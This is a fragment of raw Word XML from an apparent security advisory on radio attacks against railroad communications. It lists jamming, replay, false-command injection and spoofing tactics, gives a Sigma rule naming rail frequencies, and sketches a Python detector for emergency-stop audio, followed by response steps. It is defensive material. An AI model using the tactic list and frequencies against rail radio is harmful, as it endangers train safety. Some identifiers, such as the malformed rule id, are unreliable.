                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sndqbgt5igr3" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Radio-Specific Techniques</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RF Tactic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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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t xml:space="preserve">Jamming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t xml:space="preserve">T0863.001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t xml:space="preserve">Block legitimate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t xml:space="preserve">Denial of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hyperlink w:anchor="ref77">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[77]</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 xml:space="preserve">Replay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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T0863.002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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Repeat commands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t xml:space="preserve">Unauthorized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hyperlink w:anchor="ref78">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[78]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t xml:space="preserve">Injection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T0863.003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t xml:space="preserve">False commands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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Safety compromise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hyperlink w:anchor="ref79">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[79]</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Spoofing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T0863.004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Fake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Trust exploitation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hyperlink w:anchor="ref80">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[80]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m46ih0anhebs" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000234">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5cbnzp1ecgbd" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000235">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n8z5p2a9xeq5" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RF Spectrum Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sigma Rule: Unauthorized Railroad Radio Transmission</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Reference: [[81]](#ref81)</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title: Anomalous VHF Railroad Frequency Activity</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id: b8d4f3a1-5c6e-4a7b-9d8f-2e3c4f5g6h7i</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status: production</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description: Detects unauthorized transmissions on railroad frequencies</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references:</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    - https://www.fcc.gov/railroad-radio-service</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logsource:</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    category: rf_monitoring</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product: sdr_sensor</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detection:</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selection:</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frequency|contains:</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            - '151.4'  # European</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 '160.'   # US freight</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 '161.'   # US passenger</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        signal_characteristics:</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            - power: '&gt;-50dBm'</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 duration: '&gt;2s'</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 modulation: 'FM'</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filter:</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authorized_callsign: null</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    condition: selection and not filter</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falsepositives:</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 Maintenance operations</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    - Emergency services</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level: critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qyrurmukcelu" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audio Pattern Recognition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Deploy at SDR monitoring stations</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import numpy as np</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from scipy.io import wavfile</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import tensorflow as tf</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class EmergencyStopDetector:</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    def __init__(self):</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self.model = tf.keras.models.load_model('rail_audio_classifier.h5')</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self.emergency_patterns = self.load_patterns()</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def analyze_transmission(self, audio_file):</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rate, data = wavfile.read(audio_file)</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 Extract features</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        mfcc = extract_mfcc(data, rate)</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spectral = extract_spectral_features(data, rate)</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        # Classify</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prediction = self.model.predict([mfcc, spectral])</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if prediction &gt; 0.95:  # High confidence</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            alert_type = self.identify_command(data)</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            self.trigger_alert(alert_type, audio_file)</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    def identify_command(self, audio_data):</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 Compare against known emergency patterns</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        for pattern_name, pattern_data in self.emergency_patterns.items():</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            if correlate(audio_data, pattern_data) &gt; 0.9:</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                return pattern_name</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return "unknown_command"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wyj571ib9dtk" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uehchq2umubz" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-30 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate spectrum monitoring</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at all major rail corridors </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref82">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[82]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy direction-finding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> equipment to locate rogue transmitters </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref83">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[83]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement frequency hopping</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where technically feasible </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[84]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alert law enforcement</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with RF detection capabilities </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref85">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[85]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ry5xkzd6624d" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-term Countermeasures (30 minutes - 24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Frequency reassignment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to unpublished channels </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref86">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[86]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement CTCSS/DCS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tone squelch systems </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref87">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[87]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy portable jammers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at critical junctions (legal review required) </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref88">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[88]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedures for all emergency stops </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref89">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[89]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vzwu677rl3ou" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium-term Solutions (1-30 days)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital radio migration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with authentication </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref90">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[90]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted communications</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref91">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[91]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geofencing validation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for transmission sources </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref92">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[92]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AI-based anomaly detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployment </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref93">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[93]</w:t>
        </w:r>
      </w:hyperlink>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bg9qopcz0mxi" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3ykelznuiphw" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Response Capability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The combination of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard AESOP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides comprehensive defense against RF attacks </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
